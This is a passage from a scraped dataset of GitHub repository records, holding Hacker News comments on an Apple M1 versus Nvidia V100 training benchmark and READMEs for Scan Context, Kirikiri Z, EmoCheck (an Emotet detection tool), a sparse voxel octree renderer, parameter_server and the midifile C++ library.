MNIST, has anyone seen something different?\"Can Apple's M1 do a good job? We cut things down to unrealstic sizes, turned off cores, and p-hacked as hard as we could until we found a way to pretend the answer was yes\">We can see better performance gains with the m1 when there are fewer weights to train likely due to the superior memory architecture of the M1.Wasn't this whole \"M1 memory\" thing decided to be a myth now some more technical people have dissected it?Can someone with more knowledge of Nvidia GPU's please say how much the V100 costs ($5-10K?) compared with the $900 mac mini.Betteridge says no.no reading if it is forced to use js. your ideas does not even matter if you wish me to use js to just learn what your ideas are.Well, putting out a tl;dr and then a graph that does not mention FP16/FP32 performance differences or anything related to TensorRT cannot be taken seriously if we talk about performance per watt. We need to see the a comparison that includes multiple scenarios so we can determine something like a break-even point between Nvidia GPUs and Apple M1 GPU, possibly even for several SotA models.No, but it's pretty good at retraining the final layer of low memory networks like MobileNet - weirdly a workload that the V100 is very poorly suited for...This is on a model designed to run faster on CPUs. It's like dropping a bowling ball on your foot and claiming excitement that you feel bruised after a few days.Maybe there's something interesting there, definitely, but the overhype of the title takes away any significant amount of clout I'd give to the publishers for research. If you find something interesting, say it, and stop making vapid generalizations for the sake of more clicks.Remember, we only can feed the AI hype bubble when we do this. It might be good results, but we need to be at least realistic about it, or there won't be an economy of innovation for people to listen to in the future, because they've tuned it out with all of the crap marketing that comes/came before it.Thanks for coming to my TED Talk!The first graph includes \"Apple Intel\", which is not mentioned anywhere else in the post. Any idea what hardware that was, and whether it used the accelerated TensorFlow?When developing ML models, you rarely train \"just one\".The article mentions that they explored a not-so-large hyper-parameter space (i.e. they trained multiple models with different parameters each).It would be interesting to know how long does the whole process takes on the M1 vs the V100.For the small models covered in the article, I'd guess that the V100 can train them all concurrently using MPS (multi-process service: multiple processes can concurrently use the GPU).In particular it would be interesting to know, whether the V100 trains all models in the same time that it trains one, and whether the M1 does the same, or whether the M1 takes N times more time to train N models.This could paint a completely different picture, particularly for the user perspective. When I go for lunch, coffee, or home, I usually spawn jobs training a large number of models, such that when I get back, all these models are trained.I only start training a small number of models at the latter phases of development, when I have already explored a large part of the model space.---To make the analogy, what this article is doing is something similar to benchmarking a 64 core CPU against a 1 core CPU using a single threaded benchmark. The 64 core CPU happens to be slightly beefier and faster than the 1 core CPU, but it is more expensive and consumes more power because... it has 64x more cores. So to put things in perspective, it would make sense to also show a benchmark that can use 64x cores, which is the reason somebody would buy a 64-core CPU, and see how the single-core one compares (typically 64x slower).---To me, the only news here is that Apple GPU cores are not very far behind NVIDIA's cores for ML training, but there is much more to a GPGPU than just the perf that you get for small models in a small number of cores. Apple would still need to (1) catch up, and (2) extremely scale up their design. They probably can do both if they set their eyes on it. Exciting times.CPUs often outperform specialized hardware on small models. This is nothing new. You'd need to go to a larger model, and then power consumption curves change too.I'm seeing a lot of M1 hype, and I suspect most of it us unwarranted. I looked at comparisons between the M1 and the latest Ryzens, and it looks like it's comparable? Does anyone know details? I only looked summarily.I categorize this as an exploration of how to benchmark desktop/workstation NPUs [1] similar to the exploration Daniel Lemire started with SIMD. Mobile SoC NPUs are used to deploy inference models on smartphones and IoT devices while discreet NPUs like Nvidia A100/V100 target cloud clusters.We don\u2019t have apples-to-apples benchmarks like SPECint/SPECfp for the SoC accelerators in the M1 (GPU, NPU, etc.) so these early attempts are both facile and critical as we try to categorize and compare the trade-offs between the SoC/discreet and performance/perf-per-watt options available.Power efficient SoC for desktops is new and we are learning as we go.[1] https://en.m.wikipedia.org/wiki/AI_acceleratorOne thing I haven\u2019t seen much mention of is getting things to run on the M1\u2019s neural engine instead of the GPU - it seems like the neural engine has ~3x more compute capacity and is specifically optimized for this type of computation.Has anyone spotted any work allowing a mainstream tensor library (e.g. jax, tf, pytorch) to run on the neural engine?I had the same experience. My M1 system does well on smaller models compared to a NVidia 1070 with 10GB of memory. My MacBook Pro only has 8GB total memory. Large models run slowly.I found setting up Apple\u2019s M1 fork of TensorFlow to be fairly easy, BTW.I am writing a new book on using Swift for AI applications, motivated by the \u201cniceness\u201d of the Swift language and Apple\u2019s CoreML libraries.\"trainable_params 12,810\"laughs(for comparison, GPT3: 175,000,000,000 parameters)Can Apple's M1 help you train tiny toy examples with no real-world relevance? You bet it can!Plus it looks like they are comparing Apples to Oranges ;) This seems to be 16 bit precision on the M1 and 32 bit on the V100. So the M1-trained model will most likely yield worse or unusable results, due to lack of precision.And lastly, they are plainly testing against the wrong target. The V100 is great, but it is far from NVIDIA's flagship for training small low-precision models. At the FP16 that the M1 is using, the correct target would have been an RTX 3090 or the like, which has 35 TFLOPS. The V100 only gets 14 TFLOPS because it lacks the dedicated TensorRT accelerator hardware.So they compare the M1 against an NVIDIA model from 2017 that lacks the relevant hardware acceleration and, thus, is a whopping 60% slower than what people actually use for such training workloads.I'm sure my bicycle will also compare very favorably against a car that is lacking two wheels :p", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "irapkaist/scancontext", "link": "https://github.com/irapkaist/scancontext", "tags": [], "stars": 635, "description": "Global LiDAR descriptor for place recognition and long-term localization", "lang": "C++", "repo_lang": "", "readme": "\n\n# Scan Context\n\n## NEWS (Oct, 2021): Scan Context++ is accepted for T-RO!\n- Our extended study named Scan Context++ is accepted for T-RO. \n - Scan Context++: Structural Place Recognition Robust to Rotation and Lateral Variations in Urban Environments\n - [Paper](https://arxiv.org/pdf/2109.13494.pdf), [Summary](https://threadreaderapp.com/thread/1443044133937942533.html), [Video](https://youtu.be/ZWEqwYKQIeg)\n- The additional evaluation codes (e.g., lateral evaluations on Oxford Radar RobotCar dataset) with the new metric (we call it recall-distribution based on KL-D) will be added soon. \n\n## Note\n- Scan Context can be easily integrated with any LiDAR odometry algorithms or any LiDAR sensors. Examples are:\n - Integrated with A-LOAM: [SC-A-LOAM](https://github.com/gisbi-kim/SC-A-LOAM)\n - Integrated with LeGO-LOAM: [SC-LeGO-LOAM](https://github.com/irapkaist/SC-LeGO-LOAM)\n - Integrated with LIO-SAM: [SC-LIO-SAM](https://github.com/gisbi-kim/SC-LIO-SAM)\n - Integrated with FAST-LIO2: [FAST_LIO_SLAM](https://github.com/gisbi-kim/FAST_LIO_SLAM)\n - Integrated with a basic ICP odometry: [PyICP-SLAM](https://github.com/gisbi-kim/PyICP-SLAM)\n - This implementation is fully python-based so slow but educational purpose. \n - If you find a fast python API for Scan Context, use [https://github.com/gisbi-kim/scancontext-pybind](https://github.com/gisbi-kim/scancontext-pybind)\n- Scan Context also works for radar.\n - Integrated with yeti-radar-odometry for radar SLAM: [navtech-radar-slam](https://github.com/gisbi-kim/navtech-radar-slam)\n - p.s. please see the ``fast_evaluator_radar`` directory for the radar place recognition evaluation (radar scan context was introduced in [MulRan dataset](https://sites.google.com/view/mulran-pr/home) paper).\n\n## NEWS (April, 2020): C++ implementation\n- C++ implementation released!\n - See the directory `cpp/module/Scancontext`\n - Features \n - Light-weight: a single header and cpp file named \"Scancontext.h\" and \"Scancontext.cpp\"\n - Our module has KDtree and we used nanoflann. nanoflann is an also single-header-program and that file is in our directory.\n - Easy to use: A user just remembers and uses only two API functions; `makeAndSaveScancontextAndKeys` and `detectLoopClosureID`.\n - Fast: tested the loop detector runs at 10-15Hz (for 20 x 60 size, 10 candidates)\n - Example: Real-time LiDAR SLAM\n - We integrated the C++ implementation within the recent popular LiDAR odometry codes (e.g., LeGO-LOAM and A-LOAM).\n - That is, LiDAR SLAM = LiDAR Odometry (LeGO-LOAM) + Loop detection (Scan Context) and closure (GTSAM)\n - For details, see `cpp/example/lidar_slam` or refer these repositories: SC-LeGO-LOAM or SC-A-LOAM.\n---\n\n\n- Scan Context is a global descriptor for LiDAR point cloud, which is proposed in this paper and details are easily summarized in this video .\n\n```\n@ARTICLE { gskim-2021-tro,\n AUTHOR = { Giseop Kim and Sunwook Choi and Ayoung Kim },\n TITLE = { Scan Context++: Structural Place Recognition Robust to Rotation and Lateral Variations in Urban Environments },\n JOURNAL = { IEEE Transactions on Robotics },\n YEAR = { 2021 },\n NOTE = { Accepted. To appear. },\n}\n\n@INPROCEEDINGS { gkim-2018-iros,\n author = {Kim, Giseop and Kim, Ayoung},\n title = { Scan Context: Egocentric Spatial Descriptor for Place Recognition within {3D} Point Cloud Map },\n booktitle = { Proceedings of the IEEE/RSJ International Conference on Intelligent Robots and Systems },\n year = { 2018 },\n month = { Oct. },\n address = { Madrid }\n}\n```\n- This point cloud descriptor is used for place retrieval problem such as place\nrecognition and long-term localization.\n\n\n## What is Scan Context?\n\n- Scan Context is a global descriptor for LiDAR point cloud, which is especially designed for a sparse and noisy point cloud acquired in outdoor environment.\n- It encodes egocentric visible information as below:\n

\n\n- A user can vary the resolution of a Scan Context. Below is the example of Scan Contexts' various resolutions for the same point cloud.\n

\n\n\n## How to use?: example cases\n- The structure of this repository is composed of 3 example use cases.\n- Most of the codes are written in Matlab.\n- A directory _matlab_ contains main functions including Scan Context generation and the distance function.\n- A directory _example_ contains a full example code for a few applications. We provide a total 3 examples.\n 1. _**basics**_ contains a literally basic codes such as generation and can be a start point to understand Scan Context.\n\n 2. _**place recognition**_ is an example directory for our IROS18 paper. The example is conducted using KITTI sequence 00 and PlaceRecognizer.m is the main code. You can easily grasp the full pipeline of Scan Context-based place recognition via watching and following the PlaceRecognizer.m code. Our Scan Context-based place recognition system consists of two steps; description and search. The search step is then composed of two hierarchical stages (1. ring key-based KD tree for fast candidate proposal, 2. candidate to query pairwise comparison-based nearest search). We note that our coarse yaw aligning-based pairwise distance enables reverse-revisit detection well, unlike others. The pipeline is below.\n

\n\n 3. _**long-term localization**_ is an example directory for our RAL19 paper. For the separation of mapping and localization, there are separated train and test steps. The main training and test codes are written in python and Keras, only excluding data generation and performance evaluation codes (they are written in Matlab), and those python codes are provided using jupyter notebook. We note that some path may not directly work for your environment but the evaluation codes (e.g., makeDataForPRcurveForSCIresult.m) will help you understand how this classification-based SCI-localization system works. The figure below depicts our long-term localization pipeline.

More details of our long-term localization pipeline is found in the below paper and we also recommend you to watch this video .\n```\n@ARTICLE{ gkim-2019-ral,\n author = {G. {Kim} and B. {Park} and A. {Kim}},\n journal = {IEEE Robotics and Automation Letters},\n title = {1-Day Learning, 1-Year Localization: Long-Term LiDAR Localization Using Scan Context Image},\n year = {2019},\n volume = {4},\n number = {2},\n pages = {1948-1955},\n month = {April}\n}\n```\n\n 4. _**SLAM**_ directory contains the practical use case of Scan Context for SLAM pipeline. The details are maintained in the related other repository _[PyICP SLAM](https://github.com/kissb2/PyICP-SLAM)_; the full-python LiDAR SLAM codes using Scan Context as a loop detector.\n\n## Acknowledgment\nThis work is supported by the Korea Agency for Infrastructure Technology Advancement (KAIA) grant funded by the Ministry of Land, Infrastructure and Transport of Korea (19CTAP-C142170-02), and [High-Definition Map Based Precise Vehicle Localization Using Cameras and LIDARs] project funded by NAVER LABS Corporation.\n\n## Contact\nIf you have any questions, contact here please\n ```\n paulgkim@kaist.ac.kr\n ```\n\n## License\n \"Creative
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.\n\n### Copyright \n- All codes on this page are copyrighted by KAIST and Naver Labs and published under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 License. You must attribute the work in the manner specified by the author. You may not use the work for commercial purposes, and you may only distribute the resulting work under the same license if you alter, transform, or create the work.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "krkrz/krkrz", "link": "https://github.com/krkrz/krkrz", "tags": ["novel", "game", "engine", "windows", "android"], "stars": 635, "description": "Kirikiri Z Project", "lang": "C++", "repo_lang": "", "readme": "# Kirikiri Z\n\nKirikiri Z is a Kirikiri 2 fork project.\n\n2016/08/18\nThe splitting of the repository is complete.\nPlugins that have not been added will be added by each Author.\nThis time, the external library in external is submoduleized.\nIf each folder in external is empty, update submodules.\nIn the future, the directory structure may change as the Android version is developed.\n\n2016/08/09\nAll plugins and other things that were in one repository were deleted, and only the source code of the main unit is now in this repository.\nSee the branch for the old directory structure.\n\nA repository containing everything close to the old configuration is now .\nEach plug-in is referenced as a submodule and managed independently.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "JPCERTCC/EmoCheck", "link": "https://github.com/JPCERTCC/EmoCheck", "tags": ["security", "malware-detection", "emotet"], "stars": 634, "description": "Emotet detection tool for Windows OS", "lang": "C++", "repo_lang": "", "readme": "# EmoCheck\n\n[![GitHub release](https://img.shields.io/github/release/jpcertcc/emocheck.svg)](https://github.com/jpcertcc/emocheck/releases)\n[![Github All Releases](https://img.shields.io/github/downloads/jpcertcc/emocheck/total.svg)](https://somsubhra.github.io/github-release-stats/?username =jpcertcc&repository=emocheck&page=1&per_page=5)\n\nEmotet detection tool for Windows OS\n\n## how to use\n\n1. Download the tool from Releases\n2. Run the tool on suspected infected hosts\n3. Check the output report\n\n## download\n\nYou can download it from the page below.\n\n [Releases](https://github.com/JPCERTCC/EmoCheck/releases)\n\n## command options\n\n(v0.0.2 added)\n\n- Report output destination directory specification (default: current directory)\n - `/output [output directory]` or `-output [output directory]`\n- Suppress command line output\n - `/quiet` or `-quiet`\n- Report output in JSON format\n - `/json` or `-json`\n- Detailed display (no report output)\n - `/debug` or `-debug`\n- Help display\n - `/help` or `-help`\n\n## How to detect Emotet\n\nEmoCheck detects the Emotet process from the list of processes on the host.\n\n## Report example\n\nWhen an Emotet is detected, a report similar to the one below is generated.\n\nText format: \n\n```txt\n[Emocheck v0.0.2]\nProgram execution time: 2020-02-10 10:45:51\n____________________________________________________\n\n[result]\nEmotet detected\n\n[detail]\n Process name : mstask.exe\n Process ID: 716\n Image path: C:\\Users\\[username]\\AppData\\Local\\mstask.exe\n____________________________________________________\n\nQuarantine/delete executables in suspicious image paths.\n```\n\nJSON format (added in v0.0.2):\n\n```json\n{\n \"scan_time\":\"2020-02-10 10:45:51\",\n \"hostname\":\"[hostname]\",\n \"emocheck_version\":\"0.0.2\",\n \"is_infected\": \"yes\",\n \"emotet_processes\":[\n {\n \"process_name\":\"mstask.exe\",\n \"process_id\":\"716\",\n \"image_path\": \"C:\\\\Users\\\\[username]\\\\AppData\\\\Local\\\\mstask.exe\"\n }\n ]\n}\n```\n\nThe report will be generated in the following path.\n\n(v0.0.1)\n`[current directory]\\yyyymmddhhmmss_emocheck.txt`\n\n(v0.0.2 or later)\n`[specified directory]\\[host name]_yyyymmddhhmmss_emocheck.txt`\n`[specified directory]\\[host name]_yyyymmddhhmmss_emocheck.json`\n\nWhen an Emotet is detected, a report similar to the one below is generated.\n\n## screenshot\n\n(v0.0.1)\n
\n\n## Change log\n\n- (2020/02/03) v0.0.1\n- (2020/02/10) v0.0.2\n - Added detection method\n - Added command options\n- (2020/08/11) v1.0.0\n - Added detection method\n- (2021/01/27) v2.0.0\n - Added detection method\n - French supportadd\n- (2022/03/04) v2.1.0\n - Added detection method\n- (2022/03/14) v2.1.1\n - Fixed a bug that could not be checked correctly when executed with system privileges\n- (2022/04/22) v2.2.0\n - Added detection method\n- (2022/05/20) v2.3.0\n - Added detection method\n- (2022/05/24) v2.3.1\n - Fixed detection method\n- (2022/05/27) v2.3.2\n - Fixed detection method\n\n## License\n\nPlease check the following page for the license.\n\n [LICENSE](https://github.com/JPCERTCC/EmoCheck/blob/master/LICENSE.txt)\n\n## others\n\n### Operation Confirmation Environment\n\n- Windows 11 21H2 64bit Japanese version\n- Windows 10 21H2 64bit Japanese version\n- Windows 8.1 64bit Japanese version\n- ~~Windows 7 SP1 32bit Japanese Version~~\n- ~~Windows 7 SP1 64bit Japanese Version~~\n\n### Build environment\n\n- Windows 10 1809 64bit Japanese version\n-Microsoft Visual Studio Community 2017\n\n### Source code\n\nIt has not been published since v2.1.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tunabrain/sparse-voxel-octrees", "link": "https://github.com/tunabrain/sparse-voxel-octrees", "tags": [], "stars": 634, "description": "CPU Sparse Voxel Octree Implementation", "lang": "C++", "repo_lang": "", "readme": "![XYZRGB Dragon](https://raw.github.com/tunabrain/sparse-voxel-octrees/master/Header.png)\n\nSparse Voxel Octrees\n=========\n\nThis project provides a multithreaded, CPU Sparse Voxel Octree implementation in C++, capable of raytracing large datasets in real-time, converting raw voxel files to octrees and converting mesh data (in form of PLY files) to voxel octrees.\n\nThe conversion routines are capable of handling datasets much larger than the working memory, allowing the creation and rendering of very large octrees (resolution 8192x8192x8192 and up).\n\nThis implementation closely follows the paper [Efficient Sparse Voxel Octrees](https://research.nvidia.com/publication/efficient-sparse-voxel-octrees) by Samuli Laine and Tero Karras.\n\nThe XYZRGB dragon belongs the the Stanford 3D Scanning Repository and is available from [their homepage](http://graphics.stanford.edu/data/3Dscanrep/) \n\nCompilation\n===========\n\nA recent compiler cupporting C++11, CMake 2.8 and SDL 1.2 are required to build.\n\nTo build on Linux, you can use the `setup_builds.sh` shell script to setup build and release configurations using CMake. After running `setup_builds.sh`, run `make` inside the newly created `build/release/` folder. Alternatively, you can use the standard CMake CLI to configure the project.\n\nTo build on Windows, you will need Visual Studio 2013 or later. Before running CMake, make sure that\n\n* CMake is on the `PATH` environment variable. An easy check to verify that this is the case is to open CMD and type `cmake`, which should output the CMake CLI help.\n* You have Windows 64bit binaries of SDL 1.2. These are available [here](https://www.libsdl.org/download-1.2.php). Make sure to grab the `SDL-devel-1.2.XX-VC.zip`. Note that if you are using a newer version of Visual Studio, you may need to compile SDL yourself in order to be compatible. Please see the SDL website for details\n* The environment variable `SDLDIR` exists and is set to the path to the folder containing SDL1.2 (you will have to set it up manually - it needs to be a system environment variable, not a user variable, for CMake to find it). CMake will use this variable to find the SDL relevant files and configure MSVC to use them\n\nAfter these prerequisites are setup, you can run `setup_builds.bat` to create the Visual Studio files. It will create a folder `vstudio` containing the `sparse-voxel-octrees.sln` solution.\n\nAlternatively, you can also run CMake manually or setup the MSVC project yourself, without CMake. The sources don't require special build flags, so the latter is easily doable if you can't get CMake to work.\n\nTo build on macOS, you will need to install SDL first (i.e. `brew install sdl`). Then build it like a regular CMake project:\n\n mkdir build\n cd build\n cmake ../\n make\n ./sparse-voxel-octrees -viewer ../models/XYZRGB-Dragon.oct\n\nOn macOS, you may need to click+drag within the application window first to make the render visible.\n\nNote: If building fails on macOS, you can try commenting out the follow lines in CMakeLists.txt\n\n #if (${CMAKE_SYSTEM_NAME} MATCHES \"Darwin\")\n # set(Sources ${Sources} \"src/SDLMain.m\")\n #endif()\n\nUsage\n=====\n\nOn startup, the program will load the sample octree and render it. Left mouse rotates the model, right mouse zooms. Escape quits the program. In order to make CLI arguments easier on Windows, you can use run_viewer.bat to start the viewer.\n\nNote that due to repository size considerations, the sample octree has poor resolution (256x256x256). You can generate larger octrees using the code, however. See Main.cpp:initScene for details. You can also use run_builder.bat to build the XYZ RGB dragon model. To do this, simply download the XYZ RGB dragon model from http://graphics.stanford.edu/data/3Dscanrep/ and place it in the models folder.\n\nCode\n====\n\nMain.cpp controls application setup, thread spawning and basic rendering (should move this into a different file instead at some point).\n\nVoxelOctree.cpp provides routines for octree raymarching as well as generating, saving and loading octrees. It uses VoxelData.cpp, which robustly handles fast access to non-square, non-power-of-two voxel data not completely loaded in memory.\n\nThe VoxelData class can also pull voxel data directly from PlyLoader.cpp, generating data from triangle meshes on demand, instead of from file, which vastly improves conversion performance due to elimination of file I/O. \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dmlc/parameter_server", "link": "https://github.com/dmlc/parameter_server", "tags": [], "stars": 634, "description": "moved to https://github.com/dmlc/ps-lite", "lang": "C++", "repo_lang": "", "readme": "\"Parameter\n\nThe parameter server is a distributed system scaling to industry size machine\nlearning problems. It provides asynchronous and zero-copy key-value pair\ncommunications between worker machines and server machines. It also supports\nflexible data consistency model, data filters, and flexible server machine\nprogramming.\n\n**NOTE: We stop maitaining this repo. Please check the newer version called [ps-lite](https://github.com/dmlc/ps-lite)**\n\n- [Document](doc/)\n- [Wiki](https://github.com/dmlc/parameter_server/wiki/)\n- How to [build](make/)\n- Examples\n - [Linear method](example/linear), [Linear method with Cloud](docker)\n - Deep neural network, see [CXXNET](https://github.com/dmlc/cxxnet) and [Minverva](https://github.com/minerva-developers/minerva)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "craigsapp/midifile", "link": "https://github.com/craigsapp/midifile", "tags": [], "stars": 634, "description": "C++ classes for reading/writing Standard MIDI Files", "lang": "C++", "repo_lang": "", "readme": "Midifile: C++ MIDI file parsing library\n=======================================\n\n\n[![Travis Build Status](https://travis-ci.org/craigsapp/midifile.svg?branch=master)](https://travis-ci.org/craigsapp/midifile) [![AppVeyor Build Status](https://ci.appveyor.com/api/projects/status/oo393u60ut1rtbf3?svg=true)](https://ci.appveyor.com/project/craigsapp/midifile)\n\nMidifile is a library of C++ classes for reading/writing Standard\nMIDI files. The library consists of 6 classes:\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n\tMidiFile\n\n\tThe main interface for dealing with MIDI files. The MidiFile class\n\tappears as a two dimensional array of MidiEvents: the first dimension\n\tis a list of tracks, and the second dimension is a list of MidiEvents.\n
\n\tMidiEventList\n\n\tA data structure that manages the list of MidiEvents for a MIDI file track.\n
\n\tMidiEvent\n\n\tThe primary storage unit for MidiMessages in a MidiFile. The class\n\tconsists of a tick timestamp (delta or absolute) and a vector of\n MIDI message bytes (or Standard MIDI File meta messages).\n
\n\tMidiMessage\n\n\tThe base class for MidiEvents. This is a STL vector of\n\tunsigned bytes representing a MIDI (or meta) message.\n
\n\tBinasc\n\n\tA helper class for MidiFile that allows reading/writing of MIDI\n\tfiles in an ASCII format describing the bytes of the binary Standard\n\tMIDI Files.\n
\n\tOptions\n\n\tA optional convenience class used for parsing command-line options\n\tin the example programs. This class can be removed from the library\n since it is not needed for using the MidiFile class.\n
\n\nHere is a schematic of how the classes are used together:\n\n![Class organization](https://user-images.githubusercontent.com/3487289/39109564-493bca94-4682-11e8-87c4-991a931ca41b.png)\n\nThe `MidiFile` class contains a vector of tracks stored in `MidiEventList`\nobjects. The `MidiEventList` is itself a vector of `MidiEvent`s, which stores\neach MIDI event in the track. `MidiEvent`s contain a timestamp and a `MidiMessage`\nwhich is a vector of unsigned char values, storing the raw bytes of a MIDI message\n(or meta-message).\n\n\nDocumentation is under construction at\n[http://midifile.sapp.org](http://midifile.sapp.org).\nEssential examples for reading and writing MIDI files\nare given below.\n\n\nDownloading\n-----------\n\nYou can download as a ZIP file from the Github page for the midifile library,\nor if you use git, then download with this command:\n\n``` bash\ngit clone https://github.com/craigsapp/midifile\n```\n\nThis will create the `midifile` directory with the source code for the library.\n\n\n\nCompiling with GCC\n------------------\n\nThe library can be compiled with the command:\n``` bash\nmake library\n```\n\nThis will create the file `lib/libmidifile.a` which can be used to link\nto programs that use the library. Example programs can be compiled with\nthe command:\n``` bash\nmake programs\n```\nThis will compile all example programs in the tools directory. Compiled\nexample programs will be stored in the `bin` directory. To compile both the\nlibrary and the example programs all in one step, type:\n``` bash\nmake\n```\n\nTo compile only a single program, such as `createmidifile`, type:\n``` bash\nmake createmidifile\n```\nYou can also place your own programs in `tools`, such as `myprogram.cpp`\nand to compile type:\n``` bash\nmake myprogram\n```\nThe compiled program will be `bin/myprogram`.\n\n\nUsing in your own project\n-------------------------\n\nThe easiest way to use the midifile library in your own project is to\ncopy the header files in the `include` directory and the source-code\nfiles in the `src` directory into your own project. You do not\nneed to copy `Options.h` or `Options.cpp` since the `MidiFile` class is\nnot dependent on them. The [verovio](https://github.com/rism-ch/verovio)\nand [midiroll](https://github.com/craigsapp/midiroll) projects on Github\nboth use this method to use the midifile library. Alternatively, you\ncan fork the midifile repository and build a compiled library file of\nthe source code that can be copied with the `include` directory contents\ninto your project.\n\n\nMIDI file reading examples\n--------------------------\n\nThe following program lists all MidiEvents in a MIDI file. The program\niterates over each track, printing a list of all MIDI events in the track.\nFor each event, the absolute tick timestamp for the performance time of\nthe MIDI message is given, followed by the message itself as a list of\nhex bytes.\n\nYou can run the `MidiFile::doTimeAnalysis()` function to convert\nthe absolute tick timestamps into seconds, according to any tempo\nmeta-messages in the file (using a default tempo of 120 quarter notes\nper minute if there are no tempo meta-messages). The absolute starting\ntime of the event is shown in the second column of the program's output.\n\nThe `MidiFile::linkNotePairs()` function can be used to match note-ons\nand note-offs. When this is done, you can access the duration of the\nnote with `MidiEvent::getDurationInSeconds()` for note-on messages. The\nnote durations are shown in the third column of the program's output.\n\nNote that the midifile library classes are in the `smf` namespace,\nso `using namespace smf;` or `smf::` prefixes are needed to access\nthe classes.\n\n``` cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include \n#include \n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.process(argc, argv);\n MidiFile midifile;\n if (options.getArgCount() == 0) midifile.read(cin);\n else midifile.read(options.getArg(1));\n midifile.doTimeAnalysis();\n midifile.linkNotePairs();\n\n int tracks = midifile.getTrackCount();\n cout << \"TPQ: \" << midifile.getTicksPerQuarterNote() << endl;\n if (tracks > 1) cout << \"TRACKS: \" << tracks << endl;\n for (int track=0; track 1) cout << \"\\nTrack \" << track << endl;\n cout << \"Tick\\tSeconds\\tDur\\tMessage\" << endl;\n for (int event=0; event\nTPQ: 120\nTRACKS: 3\n\nTrack 0\nTick\tSeconds\tDur\tMessage\n0\t0\t\tff 2f 0\n\nTrack 1\nTick\tSeconds\tDur\tMessage\n0\t0\t0.5\t90 48 40\n120\t0.5\t\t80 48 40\n120\t0.5\t0.5\t90 48 40\n240\t1\t\t80 48 40\n240\t1\t0.5\t90 4f 40\n360\t1.5\t\t80 4f 40\n360\t1.5\t0.5\t90 4f 40\n480\t2\t\t80 4f 40\n480\t2\t0.5\t90 51 40\n600\t2.5\t\t80 51 40\n600\t2.5\t0.5\t90 51 40\n720\t3\t\t80 51 40\n720\t3\t1\t90 4f 40\n960\t4\t\t80 4f 40\n960\t4\t0.5\t90 4d 40\n1080\t4.5\t\t80 4d 40\n1080\t4.5\t0.5\t90 4d 40\n1200\t5\t\t80 4d 40\n1200\t5\t0.5\t90 4c 40\n1320\t5.5\t\t80 4c 40\n1320\t5.5\t0.5\t90 4c 40\n1440\t6\t\t80 4c 40\n1440\t6\t0.5\t90 4a 40\n1560\t6.5\t\t80 4a 40\n1560\t6.5\t0.5\t90 4a 40\n1680\t7\t\t80 4a 40\n1680\t7\t1\t90 48 40\n1920\t8\t\t80 48 40\n1920\t8\t\tff 2f 0\n\nTrack 2\nTick\tSeconds\tDur\tMessage\n0\t0\t0.5\t90 30 40\n120\t0.5\t\t80 30 40\n120\t0.5\t0.5\t90 3c 40\n240\t1\t\t80 3c 40\n240\t1\t0.5\t90 40 40\n360\t1.5\t\t80 40 40\n360\t1.5\t0.5\t90 3c 40\n480\t2\t\t80 3c 40\n480\t2\t0.5\t90 41 40\n600\t2.5\t\t80 41 40\n600\t2.5\t0.5\t90 3c 40\n720\t3\t\t80 3c 40\n720\t3\t0.5\t90 40 40\n840\t3.5\t\t80 40 40\n840\t3.5\t0.5\t90 3c 40\n960\t4\t\t80 3c 40\n960\t4\t0.5\t90 3e 40\n1080\t4.5\t\t80 3e 40\n1080\t4.5\t0.5\t90 3b 40\n1200\t5\t\t80 3b 40\n1200\t5\t0.5\t90 3c 40\n1320\t5.5\t\t80 3c 40\n1320\t5.5\t0.5\t90 39 40\n1440\t6\t\t80 39 40\n1440\t6\t0.5\t90 35 40\n1560\t6.5\t\t80 35 40\n1560\t6.5\t0.5\t90 37 40\n1680\t7\t\t80 37 40\n1680\t7\t1\t90 30 40\n1920\t8\t\t80 30 40\n1920\t8\t\tff 2f 0\n\n\nThe default behavior of the `MidiFile` class is to store the absolute\ntick times of MIDI events, available in `MidiEvent::tick`, which is the\ntick time from the start of the file to the current event. In standard\nMIDI files, tick are stored as delta values, where the tick indicates the\nduration to wait since the previous message in a track. To access the\ndelta tick values, you can either (1) subtrack the current tick time from\nthe previous tick time in the list, or call `MidiFile::makeDeltaTime()`\nto convert the absolute tick values into delta tick values.\n\nThe `MidiFile::joinTracks()` function can be used to convert multi-track\ndata into a single time sequence. The `joinTrack()` operation can be\nreversed by calling the `MidiFile::splitTracks()` function. Here is a sample\nof program that joins the `MidiEvents` into a single track so that the\ndata can be processed in a single loop:\n\n``` cpp\n#include \"MidiFile.h\"\n#include \"Options.h\"\n#include \n#include \n\nusing namespace std;\nusing namespace smf;\n\nint main(int argc, char** argv) {\n Options options;\n options.process(argc, argv);\n MidiFile midifile;\n if (options.getArgCount() > 0) midifile.read(options.getArg(1));\n else midifile.read(cin);\n cout << \"TPQ: \" << midifile.getTicksPerQuarterNote() << endl;\n cout << \"TRACKS: \" << midifile.getTrackCount() << endl;\n midifile.joinTracks();\n // midifile.getTrackCount() will now return \"1\", but original\n // track assignments can be seen in .track field of MidiEvent.\n cout << \"TICK DELTA TRACK MIDI MESSAGE\\n\";\n cout << \"____________________________________\\n\";\n MidiEvent* mev;\n int deltatick;\n for (int event=0; event < midifile[0].size(); event++) {\n mev = &midifile[0][event];\n if (event == 0) deltatick = mev->tick;\n else deltatick = mev->tick - midifile[0][event-1].tick;\n cout << dec << mev->tick;\n cout << '\\t' << deltatick;\n cout << '\\t' << mev->track;\n cout << '\\t' << hex;\n for (int i=0; i < mev->size(); i++)\n cout << (int)(*mev)[i] << ' ';\n cout << endl;\n }\n return 0;\n}\n```\n\nBelow is the new single-track output. The first column is the absolute\ntick timestamp of the message; the second column is the delta tick value;\nthe third column is the original track value; and the last column\ncontains the MIDI message (in hex bytes).\n\n
